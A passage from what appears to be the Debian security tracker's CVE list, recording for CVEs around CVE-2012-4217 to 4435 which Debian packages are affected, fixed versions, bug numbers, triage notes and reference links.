2.0.0rc2-2+deb7u1 NOTE: http://seclists.org/oss-sec/2012/q3/509 NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=a60f05ad44e824f6230b22f8976399340cb535dc CVE-2012-4435 (fwknop before 2.0.3 does not properly validate IP addresses, which ...) - fwknop 2.0.3-1 (bug #688151) [squeeze] - fwknop (Vulnerable code not present) [wheezy] - fwknop 2.0.0rc2-2+deb7u1 NOTE: http://seclists.org/oss-sec/2012/q3/509 NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=f4c16bc47fc24a96b63105556b62d61c1ba7d799 CVE-2012-4434 [fwknop 2.0.3: multiple DoS / code execution flaw] RESERVED - fwknop 2.0.3-1 (bug #688151) [squeeze] - fwknop (Vulnerable code not present) [wheezy] - fwknop 2.0.0rc2-2+deb7u1 NOTE: http://seclists.org/oss-sec/2012/q3/509 NOTE: http://www.cipherdyne.org/cgi-bin/gitweb.cgi?p=fwknop.git;a=commitdiff;h=d46ba1c027a11e45821ba897a4928819bccc8f22 CVE-2012-4433 (Multiple integer overflows in operations/external/ppm-load.c in GEGL ...) - gegl 0.2.0-2+nmu1 (bug #692435) [squeeze] - gegl (PPM code not yet present) NOTE: http://seclists.org/oss-sec/2012/q4/215 CVE-2012-4432 (Use-after-free vulnerability in opngreduc.c in OptiPNG Hg and 0.7.x ...) - optipng (Introduced in 0.7, bug #687998) CVE-2012-4431 (org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat ...) - tomcat7 7.0.28-4 (bug #695251) - tomcat6 6.0.35-6 (bug #695250) CVE-2012-4430 (The dump_resource function in dird/dird_conf.c in Bacula before 5.2.11 ...) {DSA-2558-1} - bacula 5.2.6+dfsg-4 (bug #687923) [wheezy] - bacula 5.2.6+dfsg-2.1 NOTE: http://www.bacula.org/git/cgit.cgi/bacula/commit/?id=67debcecd3d530c429e817e1d778e79dcd1db905 CVE-2012-4429 (Vino 2.28, 2.32, 3.4.2, and earlier allows remote attackers to read ...) - vino (bug #687596; low) [squeeze] - vino (Minor issue) [wheezy] - vino (Minor issue) CVE-2012-4428 RESERVED - openslp-dfsg (bug #687597; low) [squeeze] - openslp-dfsg (Minor issue) [wheezy] - openslp-dfsg (Minor issue) NOTE: no upstream solution as of 11/17/2012 CVE-2012-4427 (The gnome-shell plugin 3.4.1 in GNOME allows remote attackers to force ...) - gnome-shell (unimportant) NOTE: I don't see much of a problem here, if you install from a repo, you need to trust it NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=684215 NOTE: As far as I can see there is still a yes/no prompt for the user. I suggest unfixed unimportant. -- helmut CVE-2012-4426 (Multiple format string vulnerabilities in mcrypt 2.6.8 and earlier ...) - mcrypt 2.6.8-1.1 [squeeze] - mcrypt (minor issue, it doesn't affect libmcrypt) CVE-2012-4425 (libgio, when used in setuid or other privileged programs in spice-gtk ...) - spice-gtk 0.12-5 (bug #689155) NOTE: http://www.openwall.com/lists/oss-security/2012/09/13/18 CVE-2012-4424 [alloca buffer overflow via strcoll] RESERVED - eglibc (low; bug #689423) [wheezy] - eglibc (Minor issue) [squeeze] - eglibc (Minor issue) CVE-2012-4423 (The virNetServerProgramDispatchCall function in libvirt before 0.10.2 ...) - libvirt 0.9.12-5 (bug #687598) [squeeze] - libvirt (Vulnerable code not present) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=857133 NOTE: http://www.openwall.com/lists/oss-security/2012/09/13/11 CVE-2012-4422 (wp-admin/plugins.php in WordPress before 3.4.2, when the multisite ...) - wordpress 3.4.2+dfsg-1 CVE-2012-4421 (The create_post function in wp-includes/class-wp-atom-server.php in ...) - wordpress 3.4.2+dfsg-1 CVE-2012-4420 [Duplicate of CVE-2012-4416] RESERVED NOT-FOR-US: Duplicate of CVE-2012-4416 CVE-2012-4419 (The compare_tor_addr_to_addr_policy function in or/policies.c in Tor ...) {DSA-2548-1} - tor 0.2.3.22-rc-1 NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/5 NOTE: https://gitweb.torproject.org/tor.git/blob/release-0.2.2:/ReleaseNotes NOTE: https://gitweb.torproject.org/tor.git/commitdiff/973c18bf0e84d14d8006a9ae97fde7f7fb97e404 NOTE: https://gitweb.torproject.org/tor.git/commitdiff/62d96284f7e0f81c40d5df7e53dd7b4dfe7e56a5 CVE-2012-4418 (Apache Axis2 allows remote attackers to forge messages and bypass ...) NOT-FOR-US: We only provide Axis 1(Java) and the C-version of Axis CVE-2012-4417 (GlusterFS 3.3.0, as used in Red Hat Storage server 2.0, allows local ...) - glusterfs 3.2.7-5 (low; bug #693112) [wheezy] - glusterfs (Minor issue) [squeeze] - glusterfs (Minor issue) CVE-2012-4416 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) CVE-2012-4415 (Stack-based buffer overflow in the guac_client_plugin_open function in ...) - libguac 0.6.0-2 (medium) NOTE: maintainer contacted us, working on update NOTE: http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac CVE-2012-4414 (Multiple SQL injection vulnerabilities in the replication code in ...) - mysql-5.1 (bug #687484) - mysql-5.5 5.5.30+dfsg-1 (bug #687485) CVE-2012-4413 (OpenStack Keystone 2012.1.3 does not invalidate existing tokens when ...) - keystone 2012.1.1-6 (bug #687428) NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/7 CVE-2012-4412 [strcoll int->buffer overflow] RESERVED - eglibc (low; bug #687530) [wheezy] - eglibc (Minor issue) [squeeze] - eglibc (Minor issue) CVE-2012-4411 (The graphical console in Xen 4.0, 4.1 and 4.2 allows local OS guest ...) {DSA-2543-1} - xen 4.1.3-2 - xen-qemu-dm-4.0 [squeeze] - xen (In Squeeze the code is in the package xen-qemu-dm-4.0) CVE-2012-4409 (Stack-based buffer overflow in the check_file_head function in extra.c ...) - mcrypt 2.6.8-1.1 [squeeze] - mcrypt (minor issue, it doesn't affect libmcrypt) NOTE: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html CVE-2012-4408 (course/reset.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and ...) - moodle 2.2.3.dfsg-2.3 (low; bug #687924) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-4407 (lib/filelib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and ...) - moodle 2.2.3.dfsg-2.3 (low; bug #687924) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-4406 (OpenStack Object Storage (swift) before 1.7.0 uses the loads function ...) - swift 1.4.8-2 (bug #686812) CVE-2012-4405 (Multiple integer underflows in the icmLut_allocate function in ...) {DSA-2595-1} - argyll 1.4.0-7 (bug #687275) - ghostscript 9.05~dfsg-6.1 (bug #687274) CVE-2012-4404 (security/__init__.py in MoinMoin 1.9 through 1.9.4 does not properly ...) {DSA-2538-1} - moin 1.9.4-8 NOTE: http://hg.moinmo.in/moin/1.9/rev/7b9f39289e16 CVE-2012-4403 (theme/yui_combo.php in Moodle 2.3.x before 2.3.2 does not properly ...) - moodle (Only affects >= 2.3) CVE-2012-4402 (webservice/lib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, ...) - moodle 2.2.3.dfsg-2.3 (bug #687924) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-4401 (Moodle 2.2.x before 2.2.5 and 2.3.x before 2.3.2 allows remote ...) - moodle 2.2.3.dfsg-2.3 (low; bug #687924) [squeeze] - moodle (Only affects >= 2.2) CVE-2012-4400 (repository/repository_ajax.php in Moodle 2.2.x before 2.2.5 and 2.3.x ...) - moodle 2.2.3.dfsg-2.3 (low; bug #687924) [squeeze] - moodle (Only affects >= 2.2) CVE-2012-4399 (The Xml class in CakePHP 2.1.x before 2.1.5 and 2.2.x before 2.2.1 ...) - cakephp (Does not affect 1.3) NOTE: http://seclists.org/bugtraq/2012/Jul/101 NOTE: http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1 CVE-2012-4398 (The __request_module function in kernel/kmod.c in the Linux kernel ...) - linux 3.2.35-1 (low) - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2012-4397 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.1debian-1 CVE-2012-4396 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.2debian-1 CVE-2012-4395 (Cross-site scripting (XSS) vulnerability in index.php in ownCloud ...) - owncloud 4.0.3debian-1 CVE-2012-4394 (Cross-site scripting (XSS) vulnerability in apps/files/js/filelist.js ...) - owncloud 4.0.5debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4393 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...) - owncloud 4.0.7debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4392 (index.php in ownCloud 4.0.7 does not properly validate the oc_token ...) - owncloud 4.0.7debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4391 (Cross-site request forgery (CSRF) vulnerability in ...) - owncloud 4.0.7debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4390 ((1) apps/calendar/appinfo/remote.php and (2) ...) - owncloud 4.0.7debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4389 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud ...) - owncloud 4.0.7debian-1 (bug #686567) [wheezy] - owncloud 4.0.4debian2-2 CVE-2012-4388 (The sapi_header_op function in main/SAPI.c in PHP 5.4.0RC2 through ...) - php5 5.4.1~rc1-1 [squeeze] - php5 (CVE-2011-1398 was never fixed in squeeze) CVE-2012-4387 (Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a ...) - libstruts1.2-java (Only affects Struts 2) NOTE: http://struts.apache.org/2.x/docs/s2-011.html CVE-2012-4386 (The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does ...) - libstruts1.2-java (Only affects Struts 2) NOTE: http://struts.apache.org/2.x/docs/s2-010.html CVE-2012-4385 [letodms CSRF] RESERVED - letodms 3.3.7+dfsg-1 (bug #689664) CVE-2012-4384 [letodms XSS] RESERVED - letodms 3.3.7+dfsg-1 (bug #689664) CVE-2012-4383 RESERVED NOT-FOR-US: Contao CVE-2012-4382 [Info leak in user blocks] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39823 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4381 [Passwords were stored in local DB even if auth systems like LDAP were used] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39184 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4380 [Insufficient API for account creation block] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39824 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4379 [CSRF] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39180 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4378 [DOM-based XSS] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=37587 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4377 [[mediawiki stored XSS] RESERVED - mediawiki 1:1.19.2-1 (bug #686330) [squeeze] - mediawiki (Introduced in 1.16) NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=39700 NOTE: http://www.openwall.com/lists/oss-security/2012/08/31/6 CVE-2012-4376 RESERVED CVE-2012-4375 RESERVED CVE-2012-4374 RESERVED CVE-2012-4373 RESERVED CVE-2012-4372 RESERVED CVE-2012-4371 RESERVED CVE-2012-4370 RESERVED CVE-2012-4369 RESERVED CVE-2012-4368 RESERVED CVE-2012-4367 RESERVED CVE-2012-4366 (Belkin wireless routers Surf N150 Model F7D1301v1, N900 Model ...) NOT-FOR-US: Belkin wireless routers CVE-2012-4365 RESERVED CVE-2012-4364 RESERVED CVE-2011-5101 (The Rumor technology in McAfee SaaS Endpoint Protection before 5.2.4 ...) NOT-FOR-US: McAfee CVE-2011-5100 (The web interface in McAfee Firewall Reporter before 5.1.0.13 does not ...) NOT-FOR-US: McAfee CVE-2010-5143 (McAfee VirusScan Enterprise before 8.8 allows local users to disable ...) NOT-FOR-US: McAfee CVE-2009-5118 (Untrusted search path vulnerability in McAfee VirusScan Enterprise ...) NOT-FOR-US: McAfee CVE-2009-5117 (The Web Post Protection feature in McAfee Host Data Loss Prevention ...) NOT-FOR-US: McAfee CVE-2009-5116 (McAfee LinuxShield 1.5.1 and earlier does not properly implement ...) NOT-FOR-US: McAfee CVE-2009-5115 (McAfee Common Management Agent (CMA) 3.5.5 through 3.5.5.588 and 3.6.0 ...) NOT-FOR-US: McAfee CVE-2012-4363 (Multiple unspecified vulnerabilities in Adobe Reader through 10.1.4 ...) NOT-FOR-US: Adobe Reader CVE-2012-4362 (hydra.exe in HP SAN/iQ before 9.5 on the HP Virtual SAN Appliance has ...) NOT-FOR-US: HP Virtual SAN Appliance CVE-2012-4361 (lhn/public/network/ping in HP SAN/iQ before 9.5 on the HP Virtual SAN ...) NOT-FOR-US: HP Virtual SAN Appliance CVE-2012-4360 (Cross-site scripting (XSS) vulnerability in the mod_pagespeed module ...) NOT-FOR-US: mod_pagespeed CVE-2012-4359 (Sielco Sistemi Winlog Pro SCADA before 2.07.18 and Winlog Lite SCADA ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4358 (Sielco Sistemi Winlog Pro SCADA before 2.07.17 and Winlog Lite SCADA ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4357 (Array index error in Sielco Sistemi Winlog Pro SCADA before 2.07.17 ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4356 (Multiple directory traversal vulnerabilities in Sielco Sistemi Winlog ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4355 (TCPIPS_Story.dll in Sielco Sistemi Winlog Pro SCADA before 2.07.18 and ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4354 (TCPIPS_Story.dll in Sielco Sistemi Winlog Pro SCADA before 2.07.17 and ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4353 (Stack-based buffer overflow in RunTime.exe in Sielco Sistemi Winlog ...) NOT-FOR-US: Sielco Sistemi Winlog SCADA CVE-2012-4352 (Multiple cross-site scripting (XSS) vulnerabilities in Stoneware ...) NOT-FOR-US: Stoneware webNetwork CVE-2012-4351 (Integer overflow in pgpwded.sys in Symantec PGP Desktop 10.x and ...) NOT-FOR-US: Symantec CVE-2012-4350 (Multiple unquoted Windows search path vulnerabilities in the (1) ...) NOT-FOR-US: Symantec Enterprise Security Manager CVE-2012-4349 (Unquoted Windows search path vulnerability in Symantec Network Access ...) NOT-FOR-US: Symantec Network Access Control CVE-2012-4348 (The management console in Symantec Endpoint Protection (SEP) 11.0 ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2012-4347 (Multiple directory traversal vulnerabilities in the management console ...) NOT-FOR-US: Symantec CVE-2012-4346 RESERVED CVE-2012-4345 (Multiple cross-site scripting (XSS) vulnerabilities in the Database ...) - phpmyadmin 4:3.4.11.1-1 [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2012-4344 (Cross-site scripting (XSS) vulnerability in Ipswitch WhatsUp Gold ...) NOT-FOR-US: Ipswitch CVE-2012-4343 (Multiple unspecified vulnerabilities in Gallery 3 before 3.0.4 allow ...) - gallery3 (bug #511715) CVE-2012-4342 (Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 ...) - gallery3 (bug #511715) CVE-2012-4341 (Multiple stack-based buffer overflows in msg_server.exe in SAP ...) NOT-FOR-US: SAP NetWeaver ABAP CVE-2012-4340 (Cross-site scripting (XSS) vulnerability in Sybase EAServer before 6.1 ...) NOT-FOR-US: Sybase CVE-2012-4339 RESERVED CVE-2012-4338 RESERVED CVE-2012-4337 (Foxit Reader before 5.3 on Windows XP and Windows 7 allows remote ...) NOT-FOR-US: Foxit Reader CVE-2012-4336 (Multiple cross-site scripting (XSS) vulnerabilities in index.php in ...) NOT-FOR-US: Flogr 2.5.6 CVE-2012-4335 (Samsung NET-i viewer 1.37.120316 allows remote attackers to cause a ...) NOT-FOR-US: Samsung NET-i CVE-2012-4334 (The ConnectDDNS method in the (1) STWConfigNVR 1.1.13.15 and (2) ...) NOT-FOR-US: Samsung NET-i CVE-2012-4333 (Multiple stack-based buffer overflows in the BackupToAvi method in the ...) NOT-FOR-US: Samsung NET-i CVE-2012-4332 (The ShareYourCart plugin 1.7.1 for WordPress allows remote attackers ...) NOT-FOR-US: Wordpress plugin CVE-2012-4331 (Multiple unspecified vulnerabilities in SPIP before 1.9.2.o, 2.0.x ...) {DSA-2461-1} - spip 2.1.13-1 CVE-2012-4330 (The Samsung D6000 TV and possibly other products allows remote ...) NOT-FOR-US: Samsung D6000 TV CVE-2012-4329 (The Samsung D6000 TV and possibly other products allow remote ...) NOT-FOR-US: Samsung D6000 TV CVE-2012-4328 (Unspecified vulnerability in the MAPI in vBulletin Suite 4.1.2 through ...) NOT-FOR-US: vBulletin CVE-2012-4327 (Unspecified vulnerability in the Image News slider plugin before 3.3 ...) NOT-FOR-US: Image News slider plugin for WordPress CVE-2012-4326 (Cross-site request forgery (CSRF) vulnerability in commonsettings.php ...) NOT-FOR-US: AlstraSoft Site Uptime Enterprise CVE-2012-4325 (Cross-site request forgery (CSRF) vulnerability in upload/users.php in ...) NOT-FOR-US: Utopia News Pro CVE-2012-4324 (Cross-site request forgery (CSRF) vulnerability in PHPJabbers Vacation ...) NOT-FOR-US: PHPJabbers Vacation Rental Script CVE-2012-4323 RESERVED CVE-2012-4322 RESERVED CVE-2012-4321 RESERVED CVE-2012-4320 RESERVED CVE-2012-4319 RESERVED CVE-2012-4318 RESERVED CVE-2012-4317 RESERVED CVE-2012-4316 RESERVED CVE-2012-4315 RESERVED CVE-2012-4314 RESERVED CVE-2012-4313 RESERVED CVE-2012-4312 RESERVED CVE-2012-4311 RESERVED CVE-2012-4310 RESERVED CVE-2012-4309 RESERVED CVE-2012-4308 RESERVED CVE-2012-4307 RESERVED CVE-2012-4306 RESERVED CVE-2012-4305 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-4304 RESERVED CVE-2012-4303 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion CVE-2012-4302 RESERVED CVE-2012-4301 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-4300 RESERVED CVE-2012-4299 RESERVED CVE-2012-4298 (Integer signedness error in the vwr_read_rec_data_ethernet function in ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-4297 (Buffer overflow in the dissect_gsm_rlcmac_downlink function in ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.6.x and 1.8.x) CVE-2012-4296 (Buffer overflow in epan/dissectors/packet-rtps2.c in the RTPS2 ...) {DSA-2590-1} - wireshark 1.8.2-1 CVE-2012-4295 (Array index error in the channelised_fill_sdh_g707_format function in ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-4294 (Buffer overflow in the channelised_fill_sdh_g707_format function in ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-4293 (plugins/ethercat/packet-ecatmb.c in the EtherCAT Mailbox dissector in ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4292 (The dissect_stun_message function in epan/dissectors/packet-stun.c in ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4291 (The CIP dissector in Wireshark 1.4.x before 1.4.15, 1.6.x before ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4290 (The CTDB dissector in Wireshark 1.4.x before 1.4.15, 1.6.x before ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4289 (epan/dissectors/packet-afp.c in the AFP dissector in Wireshark 1.4.x ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4288 (Integer overflow in the dissect_xtp_ecntl function in ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4287 (epan/dissectors/packet-mongo.c in the MongoDB dissector in Wireshark ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-4286 (The pcapng_read_packet_block function in wiretap/pcapng.c in the ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-4285 (The dissect_pft function in epan/dissectors/packet-dcp-etsi.c in the ...) - wireshark 1.8.2-1 (unimportant) NOTE: not suitable for code injection CVE-2012-4284 RESERVED CVE-2011-5099 (SQL injection vulnerability in helper/popup.php in the ccNewsletter ...) NOT-FOR-US: Joomla addon CVE-2012-4283 (Cross-site scripting (XSS) vulnerability in the Login With Ajax plugin ...) NOT-FOR-US: Login With Ajax plugin for Wordpress CVE-2012-4282 (SQL injection vulnerability in photo.php in Trombinoscope 3.5 allows ...) NOT-FOR-US: Trombinoscope 3.5 CVE-2012-4281 (Multiple SQL injection vulnerabilities in Travelon Express 6.2.2 allow ...) NOT-FOR-US: Travelon Express 6.2.2 CVE-2012-4280 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Free Realty 3.1-0.6 CVE-2012-4279 (Multiple SQL injection vulnerabilities in Free Realty 3.1-0.6 allow ...) NOT-FOR-US: Free Realty 3.1-0.6 CVE-2012-4278 (Multiple cross-site scripting (XSS) vulnerabilities in Free Realty ...) NOT-FOR-US: Free Realty CVE-2012-4277 (Cross-site scripting (XSS) vulnerability in the ...) - smarty3 3.1.10-1 - smarty (low) CVE-2012-4276 (Unspecified vulnerability in Hitachi IT Operations Director 02-50-01 ...) NOT-FOR-US: Hitachi IT Operations Director CVE-2012-4275 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...) NOT-FOR-US: Hitachi IT Operations Director CVE-2012-4274 (Unspecified vulnerability in Hitachi Cobol GUI Option 06-00, 06-01 ...) NOT-FOR-US: Hitachi Cobol GUI Option CVE-2012-4273 (Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 ...) NOT-FOR-US: 2 Click Social Media Buttons plugin for Wordpress CVE-2012-4272 (Multiple cross-site scripting (XSS) vulnerabilities in the 2 Click ...) NOT-FOR-US: 2 Click Social Media Buttons plugin for WordPress CVE-2012-4271 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Wordpress plugin CVE-2012-4270 (Cross-site scripting (XSS) vulnerability in eFront 3.6.11 allows ...) NOT-FOR-US: eFront CVE-2012-4269 (Unrestricted file upload vulnerability in eFront 3.6.11 allows remote ...) NOT-FOR-US: eFront CVE-2012-4268 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: BulletProof Security plugin for WordPress CVE-2012-4267 (Cross-site scripting (XSS) vulnerability in user/register in Sockso ...) NOT-FOR-US: Sockso CVE-2012-4266 (Cross-site scripting (XSS) vulnerability in client_details.php in ...) NOT-FOR-US: Proman Xpress CVE-2012-4265 (SQL injection vulnerability in category_edit.php in Proman Xpress ...) NOT-FOR-US: Proman Xpress CVE-2012-4264 (Multiple cross-site scripting (XSS) vulnerabilities in the Better WP ...) NOT-FOR-US: Better WP Security plugin for WordPress CVE-2012-4263 (Cross-site scripting (XSS) vulnerability in inc/admin/content.php in ...) NOT-FOR-US: Better WP Security plugin for Wordpress CVE-2012-4262 (Multiple cross-site scripting (XSS) vulnerabilities in myCare2x allow ...) NOT-FOR-US: myCare2x CVE-2012-4261 (SQL injection vulnerability in modules/patient/mycare2x_pat_info.php ...) NOT-FOR-US: myCare2x CVE-2012-4260 (Multiple SQL injection vulnerabilities in myCare2x allow remote ...) NOT-FOR-US: myCare2x CVE-2012-4259 (Cross-site scripting (XSS) vulnerability in the contacts in (1) XPhone ...) NOT-FOR-US: XPhone Virtual Directory CVE-2012-4258 (Multiple SQL injection vulnerabilities in MYRE Real Estate Software ...) NOT-FOR-US: MYRE Real Estate Software CVE-2012-4257 (Yaqas (Yet Another Question & Answer System) 1.0 Alpha 1 allows remote ...) NOT-FOR-US: Yaqas CVE-2012-4256 (The jNews (com_jnews) component 7.5.1 for Joomla! allows remote ...) NOT-FOR-US: jNews for Joomla! CVE-2012-4255 (MySQLDumper 1.24.4 allows remote attackers to obtain sensitive ...) NOT-FOR-US: MySQLDumper CVE-2012-4254 (MySQLDumper 1.24.4 allows remote attackers to obtain sensitive ...) NOT-FOR-US: MySQLDumper CVE-2012-4253 (Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 ...) NOT-FOR-US: MySQLDumper CVE-2012-4252 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: MySQLDumper CVE-2012-4251 (Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper ...) NOT-FOR-US: MySQLDumper CVE-2012-4250 (Stack-based buffer overflow in the RequestScreenOptimization function ...) NOT-FOR-US: Samsung NET-i viewer CVE-2012-4249 (The Amazon Lab126 com.lab126.system sendEvent implementation on the ...) NOT-FOR-US: Kindle Touch CVE-2012-4248 (The Amazon Kindle Touch before 5.1.2 does not properly restrict access ...) NOT-FOR-US: Kindle Touch CVE-2012-4247 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: phplist CVE-2012-4246 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: phplist CVE-2012-4245 (The scriptfu network server in GIMP 2.6 does not require ...) - gimp (unimportant) NOTE: The interface isn't designed or advertised to be secure, this is hardly a security issue in practice CVE-2012-4244 (ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before ...) {DSA-2547-1} - bind9 1:9.8.4.dfsg-1 (bug #693015) [wheezy] - bind9 1:9.8.1.dfsg.P1-4.4 - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) CVE-2012-4243 RESERVED CVE-2012-4242 (Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin ...) NOT-FOR-US: MF Gig Calendar CVE-2012-4241 RESERVED CVE-2012-4240 RESERVED CVE-2012-4239 RESERVED CVE-2012-4238 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: TCExam CVE-2012-4237 (Multiple SQL injection vulnerabilities in TCExam before 11.3.008 allow ...) NOT-FOR-US: TCExam CVE-2012-4236 (Cross-site scripting (XSS) vulnerability in the refresh_page function ...) NOT-FOR-US: Total Shop UK eCommerce CVE-2012-4235 (The RSGallery2 (com_rsgallery2) component before 3.2.0 for Joomla! ...) NOT-FOR-US: Joomla addon CVE-2012-4234 RESERVED CVE-2012-4233 (LibreOffice 3.5.x before 3.5.7.2 and 3.6.x before 3.6.1, and ...) {DSA-2570-1} - libreoffice 1:3.5.4+dfsg-3 (low) - openoffice.org 1:3.3.0-1 (low) NOTE: Since 3.3.0 openoffice.org is a transitional source package NOTE: https://www.htbridge.com/advisory/HTB23106 CVE-2012-4232 (SQL injection vulnerability in admin/index.php in jCore before 1.0pre2 ...) NOT-FOR-US: jCore CVE-2012-4231 (Cross-site scripting (XSS) vulnerability in admin/index.php in jCore ...) NOT-FOR-US: jCore CVE-2012-4230 RESERVED CVE-2012-4229 RESERVED CVE-2012-4228 RESERVED CVE-2012-4227 RESERVED CVE-2012-4226 RESERVED CVE-2012-4225 (NVIDIA UNIX graphics driver before 295.71 and before 304.32 allows ...) - nvidia-graphics-drivers 304.37-1 (bug #684781) - nvidia-graphics-drivers-legacy-173xx 173.14.35-3 [squeeze] - nvidia-graphics-drivers 195.36.31-6squeeze2 [squeeze] - nvidia-graphics-drivers-legacy-173xx (Non-free not supported) NOTE: http://seclists.org/fulldisclosure/2012/Aug/4 NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3140 CVE-2012-4224 REJECTED CVE-2012-4223 REJECTED CVE-2012-4222 (drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4221 (Integer overflow in diagchar_core.c in the Qualcomm Innovation Center ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4220 (diagchar_core.c in the Qualcomm Innovation Center (QuIC) Diagnostics ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4219 (show_config_errors.php in phpMyAdmin 3.5.x before 3.5.2.1 allows ...) - phpmyadmin (unimportant) NOTE: Path disclosure irrelevant in Debian CVE-2012-4218 (Use-after-free vulnerability in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4217 (Use-after-free vulnerability in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only 